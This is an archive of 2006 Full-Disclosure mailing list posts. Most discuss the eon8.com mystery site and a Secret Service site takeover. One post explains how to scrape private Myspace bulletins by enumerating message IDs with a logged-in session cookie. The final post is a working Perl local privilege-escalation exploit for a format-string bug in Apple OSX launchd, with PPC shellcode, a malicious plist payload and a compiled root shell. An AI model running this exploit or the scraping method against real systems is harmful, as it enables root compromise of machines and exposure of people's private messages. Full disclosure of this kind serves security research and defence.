Looks pritty omonous, I would not log onto it if I were you until tommorow. There is a counter down counting, 4 hours 35 minutes to go. Its logging your IP address as well. Dont know maybe nothing but it looks a bit omonous as I said. If I do not post a message within 5 hours you will know that I have been cracked :) Aaron - Original Message - From: "Jay Buhrt" [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Friday, June 30, 2006 10:13 PM Subject: **SPAM** [Full-disclosure] Weird... www.eon8.com Does anyone know about this site, or the projects related to it? www.eon8.com ? -- Jay Buhrt Achievement Focused Technology, Inc. [EMAIL PROTECTED] 574-538-8944 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: **SPAM** [Full-disclosure] Weird... www.eon8.com
The counter restarts with a different time each time you refresh the page, so not so omonous ! Aaron - Original Message - From: Jay Buhrt [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Friday, June 30, 2006 10:13 PM Subject: **SPAM** [Full-disclosure] Weird... www.eon8.com Does anyone know about this site, or the projects related to it? www.eon8.com ? -- Jay Buhrt Achievement Focused Technology, Inc. [EMAIL PROTECTED] 574-538-8944 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: **SPAM** [Full-disclosure] Weird... www.eon8.com
it was digged a few hours ago. people agreed it's a viral for a game, or something. of course conspiracy buffs are LOVING the idea of some evil organization USING A FRACKING WEBSITE to talk to their members... On Sat, 1 Jul 2006 00:30:49 +0100 Aaron Gray [EMAIL PROTECTED] wrote: AG The counter restarts with a different time each time you refresh the page, AG so not so omonous ! AG AG Aaron AG AG - Original Message - AG From: Jay Buhrt [EMAIL PROTECTED] AG To: full-disclosure@lists.grok.org.uk AG Sent: Friday, June 30, 2006 10:13 PM AG Subject: **SPAM** [Full-disclosure] Weird... www.eon8.com AG AG AG Does anyone know about this site, or the projects related to it? AG www.eon8.com ? AG AG -- AG Jay Buhrt AG Achievement Focused Technology, Inc. AG [EMAIL PROTECTED] AG 574-538-8944 AG AG ___ AG Full-Disclosure - We believe in it. AG Charter: http://lists.grok.org.uk/full-disclosure-charter.html AG Hosted and sponsored by Secunia - http://secunia.com/ AG AG ___ AG Full-Disclosure - We believe in it. AG Charter: http://lists.grok.org.uk/full-disclosure-charter.html AG Hosted and sponsored by Secunia - http://secunia.com/ AG year(now) + 1 será o ano do linux! Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299 vida digital: http://www.contraditorium.com site pessoal e blog: http://www.carloscardoso.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: **SPAM** [Full-disclosure] Weird... www.eon8.com
Just being careful. Phew, I thought some evil organization was just about to hack the world with a new 0day :) Aaron - Original Message - From: Cardoso [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Saturday, July 01, 2006 12:40 AM Subject: Re: **SPAM** [Full-disclosure] Weird... www.eon8.com it was digged a few hours ago. people agreed it's a viral for a game, or something. of course conspiracy buffs are LOVING the idea of some evil organization USING A FRACKING WEBSITE to talk to their members... On Sat, 1 Jul 2006 00:30:49 +0100 Aaron Gray [EMAIL PROTECTED] wrote: AG The counter restarts with a different time each time you refresh the page, AG so not so omonous ! AG AG Aaron AG AG - Original Message - AG From: Jay Buhrt [EMAIL PROTECTED] AG To: full-disclosure@lists.grok.org.uk AG Sent: Friday, June 30, 2006 10:13 PM AG Subject: **SPAM** [Full-disclosure] Weird... www.eon8.com AG AG AG Does anyone know about this site, or the projects related to it? AG www.eon8.com ? AG AG -- AG Jay Buhrt AG Achievement Focused Technology, Inc. AG [EMAIL PROTECTED] AG 574-538-8944 AG AG ___ AG Full-Disclosure - We believe in it. AG Charter: http://lists.grok.org.uk/full-disclosure-charter.html AG Hosted and sponsored by Secunia - http://secunia.com/ AG AG ___ AG Full-Disclosure - We believe in it. AG Charter: http://lists.grok.org.uk/full-disclosure-charter.html AG Hosted and sponsored by Secunia - http://secunia.com/ AG year(now) + 1 será o ano do linux! Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299 vida digital: http://www.contraditorium.com site pessoal e blog: http://www.carloscardoso.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] United States Secret Service
They replace a website with the USSS logo., like what happened in the case of the shadow crew. I'm not pro Shadow crew but I find it highly offensive that the USSS are acting in such a This is now property of the USSS with logo, asking the remaining members of said group to hand themselves in. I don't care if you are a government, corporation or intelligence agency, there is no excuse for defacement, both legal and illegal, because it sends out the wrong message. It looks like defacement, it feels like defacement, it may not be illgal, but it sure gives out the wrong signal to the wrong audience. People in the know, know exatly what my comments above are about. I'm re-issuing my original outcry over the conduct and policy of USSS due to the recent conviction of the co-founder of shadow crew. Thanks, n3td3v It will be interesting to see if folks remember what i'm talking about, and those who do are truly on the ball. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: **SPAM** [Full-disclosure] Weird... www.eon8.com
On Fri, 30 Jun 2006 21:15:27 -0300, Cardoso said: Yes, you may be right. What better place to hide than in plain sight? Using the old nobody would do that, we^H^H they can publish evil instructions the operatives, and all the fools at NSA, GRU and MI-6 will never take us^H^H them seriously until it's too late. The whole Steve Jackson Games thing was a set-up to make the TLAs wary. ;) pgpVpeZDJ6Gps.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] United States Secret Service
On Fri, 30 Jun 2006 23:30:08 BST, n3td3v said: They replace a website with the USSS logo., like what happened in the case of the shadow crew. You got any proof the USSS actually did it, and isn't being joe-jobbed here? For starters, logs showing where/how the logo was uploaded, and other evidence linking that IP address to the USSS pgp3hQijqwMuX.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: **SPAM** [Full-disclosure] Weird... www.eon8.com
Sometimes checking the cached Google version gives some basic information without visiting an url. But when choosing 'Show Google's cache of www.eon8.com/' my Firefox says Transferring data from www.eon8.com... This is weird and not expected, because I have never visited this site. Cached version was saved on 22nd Jun. It shows Googlebot's IP at main page: IP: 66.249.66.207 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) I.e. why there is traffic to eon8.com at all? - Juha-Matti Aaron Gray [EMAIL PROTECTED] wrote: Just being careful. Phew, I thought some evil organization was just about to hack the world with a new 0day :) Aaron --clip-- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hah, Interesting.....
{eon8} Complete
As of July 1st, 2006, the E8 Project has completed.
The purpose of this project was to determine the reactions of the
internet public to lack of information.
History
The domain eon8.com was chosen, as it is short, easily remembered, and
eon9 was already registered.
It was originally posted on www.msfn.org, but was promptly removed as
'spam'. It was enough time for it to be copied to other forums
throughout December 2005.
Results
We were amazed to discover that the site was instantly linked with
terrorism, simply for the fact that it seems mysterious. Evil was the
number one first impression people had of the site, in spite of the fact
that there are no threats on the site. The only thing Eon 8 says is We
don't want you here. Nothing else.
Other less disappointing opinions were social experimentation (which was
correct), James Bond movie viral marketing, and promotions for video games.
For many people, being faced with a countdown timer was an instant
reason to try to shut down or hack the site. This is a worrying
reaction, that if someone doesn't understand something they must destroy
it. As a result, the servers have been hit quite hard these last few
days, but luckily 99% of the 'hackers' could easily be described as
'l4me n00bs'.
Another worrying example of paranoia was how quickly people would jump
to conclusions, such as telephoning the registered owner of a dog seen
in a photograph on a server that hosts a page that links to eon8.
Surprises
The folks at Unfiction.com were the most resourceful and inventive, they
successfully managed to decrypt several of the 'codes' on the site,
forcing them to be re-encrypted using more secure methods.
FAQ
What about eon5.com?
Nothing to do with us. Pure coincidence, but worked in our favor.
What about the 8th eon being the end of the world?
We picked Eon 8 because Eon 9 was already taken. We didn't know about
the significance of this. Eon is a cool sounding word!
Why July 1st?
We didn't know how long it would take to get the word out using our
subtle promotion methods. We allowed over 6 months.
What do the codes on the site mean?
They're mostly randomly generated integers encrypted with md5, but with
certain letters removed and replaced. The Logs page is simply based on
the current timestamp, encrypted and modified. You can't decrypt them,
they really are random numbers.
What is the Deployment Map?
They're dots placed over major cities and several random locations, it
was done mostly from memory. The random gif filename is an added touch
to force a slight delay on loading, which looks more impressive in
Internet Explorer, but not as much in Firefox.
What's the password?
There isn't one. If you did somehow manage to get in, you'd see an empty
folder with a single text file that says This is a decoy folder. Please
connect to the internal secure network.
Can I see your website statistics?
Yes, click here.
Are you anything to do with Scientology?
Did you see anything talking about a Free Personality Test or Xenu? Use
your brain.
Who are you, really?
The most I can tell you is I am a 23 year old web designer from Florida
named Mike. I can't narrow it down anymore than that. When I say 'we', I
really mean 'me'.
Conclusions
People take things too seriously and panic over the most trivial things.
But at the same time there are many people out there who think things
through without jumping to conclusions. You can't let pointless
speculation rule your lives and force you to live in fear.
In Closing
Thanks to everyone who kept things interesting, especially to the folks
at unfiction. Sorry there is no ARG for you to play, but at least you
had fun while it lasted.
Click here for one Final Message from Eon 8
BE HAPPY
THE END
Sincerely, x21b
Happy birthday, mtcaptain. From 'ls224' (aka x21b). Yes that really was
me in the #eon-8 channel
--
Jay Buhrt
Achievement Focused Technology, Inc.
[EMAIL PROTECTED]
574-538-8944
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Data Mining Myspace Bulletins
The same goes for forums; you can even read posts from private forums. Unfortunately, you aren't able to tell which forum a post came from just from the postID, and it is enormously difficult to guess what postids might appear in which group, due to the high volume. If any is interested in this (which I doubt), I've got a perl script to slurp a range of them (which is way shorter than your C :P but probably slower). It can certainly be an interesting read though; people seem to have a false sense of anonymity, judging from what they're willing to admit on these forums. On 6/30/06, John Hackenger [EMAIL PROTECTED] wrote: Myspace Bulletins: The good, the bad, and the ugly Data Mining Myspace, a case study Author: stderr ([EMAIL PROTECTED]) http://stderr.linuxinit.net Original release: http://www.pandora-security.com -- 1. Abstract We all know about myspace.com, and I'll go ahead and admit that I actually have an account to keep up with friends. Myspace is full of a bunch of idiots, but it can be a great tool for keeping up with people... when used properly. Myspace has long been a hacker playground, you may remember the infamous Samy is my hero worm. The worm took advantage of several poor input validation techniques which were being employed. Each person that went to a page with his script in it, automatically sent him a friend request. After this alarming stunt, Myspace fixed a lot of the injection vulnerabilities. -- 2. Introduction to Bulletins On Myspace, you can send bulletins which are sent to all of the friends on your list. That way if you're going on vacation or something, you can let ALL of your friends know what's happening by sending only one message. Most people assume that only their friends can read the bulletins they post... they are sadly mistaken. When you open up a bulletin, you go to a url like the following. http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.readmessageID=1 Yes, you guessed it. If you change the messageID number, you can view any bulletin on Myspace that hasn't yet expired. Now, if we could just collect a ton of bulletins, then we could surely find some juicy information like cell phone numbers, when people are leaving for vacation, where they're going... the list goes on and on. The implementation of bulletins so that everyone can view them may be intentional, but most people assume that bulletins are only readable by friends. Because of this belief, many people post personal details in bulletins, never expecting people like you to read them. The mere existence of the Delete from friends button implies that only friends should be able to read your bulletins. -- 3. Mining the data I was able to whip together a small C program that generates urls, retrieves the bulletin, and saves the html to a file. Once all of the data has been downloaded, it's easy to parse through using a tool like grep. In order for this program to work, you need to download a tool called 'netcat'. You will also need to get your cookie once you're logged into myspace, so that you can view the bulletins. First of all, let's create a new file named request.txt The contents should look something like this, but you'll need to change the cookie to match yours. === Host: bulletin.myspace.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414 Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html ;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cookie: TIMEZONE=3; ODZDBXZG9tY#luPXXhaG#vJSRsZD1DXEWQSASLKJFLAJF;ODIJ;AEIJOIJDFOIAJEDKL124DADK ADS;IFJO;IEAJOIFEA89U;FIO;23A;OIJDSJAOIJOIEJWAIJLDOISJFOIJ39812H12O8JAW098320AJDSLKJ32AOJ12LIJ4 A;OIJ;S;OAIJMCOISJAO8JOIRA2J38U2398JIOAJDFKANKJCNLUIHA8W734HLAIL2L3ANUHDLUIAHF87Y3LAHAKDJHF8L83 5PVVTJmRhdGluZz0wJmRyaW5rZXI9MCZlZHVjYXRpb25pZD0x; NGUserID=a258ca5-2341-1231956342-6; MYSPACE=myspace; AUTOSONGPLAY=0; UNIQUELOGINTAKEOVER_10207218=%7Bts%20%272006-06-2df%047%3A32%x A18%27%7D; MSCOUNTRY=US; FRNDIDxr2g=; rsi_want=0; COUNTRYCODE=MFMGCisGAQQBgjdYA7GgRTBDB gorBgEEAYI3WAMBoDUwMwIDAgABAgJmAwICAMAECHndruAVl3qwBBBgdJZ9K7N%2F34aRlhOz2UArBAi%2BqGfSVTRm7w%3 D%3D; MSCulture=IP=127.0.0.1IPCulture=en-USPreferredCulture=en-USCountry=US; MYUSERINFO=saoijaoi;joiewjaoijdosiajdklajfoijADFJIEAJKDJFIJIEAdlkjlijelaijalidjflijaslijldsijli AIDFJIAEwjfoiajdfeAIJDfAOJeagEOJeAJDalkjdadfAEJaijadlijfdilakmckj85423alkjdklafjdlkajdklajlkjea aDJFAILJJae'oifja;3o4ijmaidjalkfmaijkladfjalkjfioeajlkmdmc,jkjiojoia3wjiojfoiejaoija;odijflkjda
Re: [Full-disclosure] DMA[2006-0628a] - 'Apple OSX launchd unformatted syslog() vulnerability'
Just so no one feels left out...
-KF
#!/usr/bin/perl
#
# http://www.digitalmunition.com/FailureToLaunch-ppc.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# Much appreciation goes to John H for all kindsa random shit like exploiting
Veritas and other random things in the past
#
# core... where the hell are you fool.
#
# This is just a vanilla format string exploit for OSX on ppc. We overwrite a
saved return addy with our shellcode address.
# This code currently overwrites a saved return addy with the stack location of
our seteuid() / execve() shellcode.
#
# This exploit will create a malicious .plist file for you to use with launchctl
# kevin-finisterres-mac-mini:~ kfinisterre$ launchctl load ./com.pwnage.plist
#
# In theory I guess you could also drop this in ~/Library/LaunchAgents
#
# This was tested against OSX 10.4.6 8l127 on a 1.25GHz PowerPC G4 and a
# 500mhz PowerPC G3 running 10.4 8A428
#
# kevin-finisterres-mac-mini:~ kfinisterre$ ls -al /sbin/launchd
# -rwsr-sr-x 1 root wheel 80328 Feb 19 04:09 /sbin/launchd
# kevin-finisterres-mac-mini:~ kfinisterre$ file /sbin/launchd
# /sbin/launchd: setuid setgid Mach-O executable ppc
#
# ./src/SystemStarter.c:374: syslog(level, buf);
#
#
http://developer.apple.com/documentation/Security/Conceptual/SecureCodingGuide/Articles/AccessControl.html
# Because launchd is a critical system component, it receives a lot of peer
review by in-house developers at Apple.
# It is less likely to contain security vulnerabilities than most production
code.
#
foreach $key (keys %ENV) {
delete $ENV{$key};
}
#// ppc execve() code by b-r00t + nemo to add seteuid(0)
$sc =
\x7c\x63\x1a\x79 .
\x40\x82\xff\xfd .
\x39\x40\x01\xc3 .
\x38\x0a\xfe\xf4 .
\x44\xff\xff\x02 .
\x39\x40\x01\x23 .
\x38\x0a\xfe\xf4 .
\x44\xff\xff\x02 .
\x60\x60\x60\x60 .
\x7c\xa5\x2a\x79\x40\x82\xff\xfd .
\x7d\x68\x02\xa6\x3b\xeb\x01\x70 .
\x39\x40\x01\x70\x39\x1f\xfe\xcf .
\x7c\xa8\x29\xae\x38\x7f\xfe\xc8 .
\x90\x61\xff\xf8\x90\xa1\xff\xfc .
\x38\x81\xff\xf8\x38\x0a\xfe\xcb .
\x44\xff\xff\x02\x7c\xa3\x2b\x78 .
\x38\x0a\xfe\x91\x44\xff\xff\x02 .
\x2f\x74\x6d\x70\x2f\x73\x68\x58;
$writeaddr = 0xbcf8; # Saved Return addy from frame 3
$ENV{TERM_PROGRAM} = - . pack('l', $writeaddr) . pack('l', $writeaddr+2) .
x 1 . $sc ;
$format =
# make it more robust yourself... I'm lazy
# 0xbfff fe70
% . 0xbfff . d%112\$hn .
% . 0x3ed9 . d%113\$hn ;
open(SUSH,/tmp/aaa.c);
printf SUSH int main(){seteuid(0);setuid(0);setgid(0);system(\/bin/sh\);}\n;
system(PATH=$PATH:/usr/bin/ cc -o /tmp/sh /tmp/aaa.c);
open(PWNED,com.pwnage.plist);
print PWNED ?xml version=\1.0\ encoding=\UTF-8\?
!DOCTYPE plist PUBLIC \-//Apple Computer//DTD PLIST 1.0//EN\
\http://www.apple.com/DTDs/PropertyList-1.0.dtd\;
plist version=\1.0\
dict
keyLabel/key
string . $format .
/string
keyProgramArguments/key
array
stringhttp://www.digitalmunition.com/string
/array
keyRunAtLoad/key
true/
/dict
/plist\n;
close(PWNED);
print open a new window and type - \launchctl load ./com.pwnage.plist\\n;
system(/sbin/launchd);
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
